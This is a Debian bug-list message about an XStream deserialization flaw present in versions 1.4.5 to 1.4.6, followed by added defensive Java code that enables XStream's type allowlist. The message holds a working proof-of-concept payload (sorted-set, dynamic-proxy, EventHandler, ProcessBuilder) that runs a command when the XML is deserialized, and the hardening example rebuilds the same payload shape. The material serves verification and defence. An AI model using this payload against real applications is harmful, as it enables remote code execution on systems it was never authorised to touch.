Bug#734821: 734821

Sébastien Delafond seb at debian.org
Fri Oct 10 09:19:58 UTC 2014


notfixed 734821 1.4.7-1
thanks

This bug was actually never in Debian, since it was introduced in 1.4.5
and closed in 1.4.7.

If anyone is interested in verifying this, the following code can be run
against the JARs present at
http://repo.maven.apache.org/maven2/com/thoughtworks/xstream/xstream/:

  import java.io.IOException;
  import com.thoughtworks.xstream.XStream;
  import com.thoughtworks.xstream.io.xml.DomDriver;

  /* Thanks to </pwntester> for the PoC
   * http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/ */
  public class XStreamExploit {
      public static void main(String[] args) throws IOException   {
          String process = "/usr/bin/xeyes";
          String payload = "<sorted-set>" +
              "<string>foo</string>" +
              "<dynamic-proxy>" +
              "<interface>java.lang.Comparable</interface>" +
              "<handler class=\"java.beans.EventHandler\">" +
              " <target class=\"java.lang.ProcessBuilder\">" +
              " <command>" +
              " <string>" + process + "</string>" +
              " </command>" +
              " </target>" +
              " <action>start</action>" +
              "</handler>" +
              "</dynamic-proxy>" +
              "</sorted-set>";
          XStream xstream = new XStream(new DomDriver());
          xstream.fromXML(payload);
      }
  }

Cheers,

--Seb
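As an added, defensive counterpart to the PoC in the message above (this is example code written for this page, not code from the original message or from the XStream project), the snippet below builds an XStream instance that uses the type-permission framework shipped with 1.4.7 to reject everything except an explicitly allowed set of types, so the same `sorted-set`/`dynamic-proxy` document is refused before any class is instantiated. It assumes XStream 1.4.7 or later on the classpath; the `Greeting` class, the `greeting` alias and the `/bin/true` command in the constructed hostile input are placeholders for whatever a real application expects.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

/* Constructed example: a deliberately tiny DTO standing in for whatever
 * type the application actually expects to receive. */
class Greeting {
    String message;
}

public class XStreamAllowlist {

    /* Build an XStream instance that refuses every type except the ones
     * the application explicitly declares (security API added in 1.4.7). */
    static XStream hardenedXStream() {
        XStream xstream = new XStream(new DomDriver());
        // Drop XStream's built-in permissions so nothing is allowed by default.
        xstream.addPermission(NoTypePermission.NONE);
        // Re-allow the harmless basics: null, primitives/boxed types, String,
        // plus the one DTO this application deserializes.
        xstream.addPermission(NullPermission.NULL);
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xstream.allowTypes(new Class[] { String.class, Greeting.class });
        // Map the element name to the DTO so legitimate input stays readable.
        xstream.alias("greeting", Greeting.class);
        return xstream;
    }

    /* Returns the parsed object, or null when the allowlist rejects the input. */
    static Object parseOrReject(XStream xstream, String xml) {
        try {
            return xstream.fromXML(xml);
        } catch (ForbiddenClassException e) {
            // The rejected type name is the detection signal worth logging:
            // it means someone fed a type the application never declared.
            System.err.println("rejected input, forbidden type: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) {
        XStream xstream = hardenedXStream();

        // Legitimate document: only allowed types, parses normally.
        String legitimate = "<greeting><message>hello</message></greeting>";
        Greeting g = (Greeting) parseOrReject(xstream, legitimate);
        System.out.println("legitimate input parsed: " + (g != null ? g.message : "(rejected)"));

        // Constructed hostile document with the same shape as the PoC, pointed
        // at a harmless command; the allowlist stops at <sorted-set> (TreeSet)
        // long before the handler or target elements are ever interpreted.
        String hostile = "<sorted-set>" +
            "<string>foo</string>" +
            "<dynamic-proxy>" +
            "<interface>java.lang.Comparable</interface>" +
            "<handler class=\"java.beans.EventHandler\">" +
            "<target class=\"java.lang.ProcessBuilder\">" +
            "<command><string>/bin/true</string></command>" +
            "</target>" +
            "<action>start</action>" +
            "</handler>" +
            "</dynamic-proxy>" +
            "</sorted-set>";
        Object result = parseOrReject(xstream, hostile);
        System.out.println("hostile input "
            + (result == null ? "rejected" : "ACCEPTED (check the permissions)"));
    }
}
```

Run against the 1.4.7 JAR from the Maven repository linked above it prints the parsed greeting and then the rejection; against 1.4.5 or 1.4.6 the `security` package does not exist and the class will not compile, which is itself a quick way to tell which side of the fix a given JAR sits on.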


